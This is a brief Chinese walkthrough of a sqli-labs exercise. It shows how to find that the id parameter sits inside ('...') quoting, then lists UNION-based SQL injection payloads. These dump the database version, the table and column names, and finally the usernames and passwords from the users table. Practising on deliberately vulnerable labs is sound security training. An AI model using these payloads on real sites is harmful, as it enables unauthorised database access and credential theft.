输入?id=1',发现其报错
说明原sql语句可能是('$id')
输入?id=1') --+,不报错,证实其猜测
有此可以开始爆出其数据库等信息
具体见sqli-lab刷题Less-1,只需要将其中的语句?id=1'部分替换为?id=1)
爆出版本号和数据库信息:?id=1') and 1=2 union select 1,version(),database() --+
爆出数据库下表名:?id=1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
猜测用户信息在users表中
爆出users字段信息:?id=1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
猜测用户名在username字段,密码在password字段
爆出用户名和密码?id=1') and 1=2 union select 1,group_concat(username),group_concat(password) from users --+